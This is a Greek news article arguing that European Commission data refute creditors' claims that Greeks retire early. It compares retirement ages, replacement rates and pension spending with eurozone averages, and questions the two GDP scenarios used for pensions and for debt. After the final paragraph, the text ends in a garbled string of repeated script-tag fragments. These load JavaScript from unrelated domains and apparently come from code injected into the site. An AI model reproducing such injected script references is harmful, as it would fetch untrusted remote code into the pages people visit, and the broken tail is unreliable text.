Το «παραμύθι» των δανειστών για το Ασφαλιστικό -Αποκαλυπτικά τα στοιχεία της Ευρωπαϊκής Επιτροπής

Διαψεύδονται πανηγυρικά όσοι εκ των δανειστών εξακολουθούν να υποστηρίζουν ότι οι Έλληνες συνεχίζουν να βγαίνουν πολύ νωρίς στη σύνταξη σε σχέση με την υπόλοιπη Ευρώπη, καθώς τα επίσημα στοιχεία της Ευρωπαϊκής Επιτροπής δείχνουν μια εντελώς διαφορετική εικόνα.

Κατ’ αρχάς, με βάση τις ισχύουσες διατάξεις- δηλαδή χωρίς να γίνει άλλου είδους παρέμβαση- το μέσο πραγματικό όριο ηλικίας εξόδου από την αγορά εργασίας το 2014 ήταν 64,4 έτη για τους άνδρες και 64,5 έτη για τις γυναίκες, όταν ο μέσος όρος στην Ευρωζώνη ήταν 63,2 και 62,6 έτη αντιστοίχως! Κι επειδή κάποιοι θα βιαστούν να πουν ότι μακροπρόθεσμα κρίνεται η βιωσιμότητα του συστήματος, η Ευρωπαϊκή Επιτροπή εκτιμά ότι το 2060 η μέση ηλικία συνταξιοδότησης για τους άνδρες θα έχει φτάσει στα 67,5 έτη και για τις γυναίκες στα 67,1 έτη, ενώ ο μέσος όρος στην Ευρωζώνη θα είναι 65,2 και 64,8 έτη αντιστοίχως!

Ακόμα πιο αποκαλυπτικά είναι τα στοιχεία, αν λάβει κανείς υπόψιν τα θεσμοθετημένα όρια ηλικίας συνταξιοδότησης, καθώς συνυπολογιζομένου του πληθυσμιακού κριτηρίου, το 2060 το όριο για άνδρες και γυναίκες υπολογίζεται ότι θα έχει φτάσει στα 71,9 έτη δηλαδή στα υψηλότερα επίπεδα της Ευρωζώνης. Στην πραγματικότητα, σε όλη την Ευρωπαϊκή Ένωση μόνο η Δανία θα έχει υψηλότερο θεσμοθετημένο όριο ηλικίας συνταξιοδότησης (72,5 έτη), όταν στην Γερμανία και στη Φινλανδία, που κουνάνε το… δάκτυλο, τα όρια ηλικίας θα διαμορφώνονται στα 67 και 66 έτη αντιστοίχως.

Ακόμα κι εκεί που “πατάνε” οι δανειστές, δηλαδή ότι τα ποσοστά αναπλήρωσης διαφοροποιούνται από αυτά που ισχύουν σε άλλες ευρωπαϊκές χώρες, η πρόβλεψη για το 2060 είναι επιβαρυντική για την Ελλάδα. Συγκεκριμένα, ενώ το 2013 το ποσοστό αναπλήρωσης σε σχέση με τις αποδοχές διαμορφωνόταν στο 45% (53% ο σταθμισμένος μέσος όρος στην Ευρωζώνη), για το 2060 το ποσοστό πέφτει στο 26,7%!

Το μόνο στοιχείο που επιτρέπει τη… γκρίνια των δανειστών, είναι η υψηλή συνταξιοδοτική δαπάνη ως ποσοστό του ΑΕΠ, στοιχείο που είναι, όμως, παραπλανητικό, καθώς από τη στιγμή που το ΑΕΠ έχει “κουρευτεί” κατά περίπου 25% από το 2010, είναι προφανές ότι ακόμα και με σταθερή δαπάνη σε απόλυτους αριθμούς, ως ποσοστό του ΑΕΠ θα εμφανίζεται υψηλότερη. Με βάση τα στοιχεία της Κομισιόν, η δαπάνη το 2013 διαμορφωνόταν στο 16,2% του ΑΕΠ με πρόβλεψη να υποχωρήσει στο 14,3% το 2060, όντας έτσι 2 μονάδες υψηλότερη από το μέσο όρο της Ευρωζώνης.

Αυτό που θα πρέπει να απαντήσουν, πάντως, οι δανειστές αλλά και όσοι υπηρεσιακοί ασχολούνται με το Ασφαλιστικό είναι γιατί υιοθετούνται δύο διαφορετικά σενάρια ΑΕΠ: άλλο για τη βιωσιμότητα του Ασφαλιστικού και άλλο για το Πρόγραμμα χρηματοδότησης (Μνημόνιο) και τη βιωσιμότητα του Χρέους. Συγκεκριμένα, τα σενάρια για το Ασφαλιστικό εκπονούνται με την παραδοχή ότι η μέση αύξηση του ΑΕΠ δεν θα είναι πάνω από 0,7%, ενώ για τη βιωσιμότητα του Χρέους εκτιμάται ότι το ΑΕΠ θα αυξάνεται κατά περίπου 3% ως το 2022 και κατά περίπου 2% για τα επόμενα χρόνια! Ή ισχύει το πρώτο σενάριο οπότε οι υπολογισμοί για το Χρέος και τις δανειακές ανάγκες πάνε… περίπατο ή ισχύει το δεύτερο σενάριο οπότε οι παρεμβάσεις στις συντάξεις θα πρέπει να είναι πιο ήπιες.___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >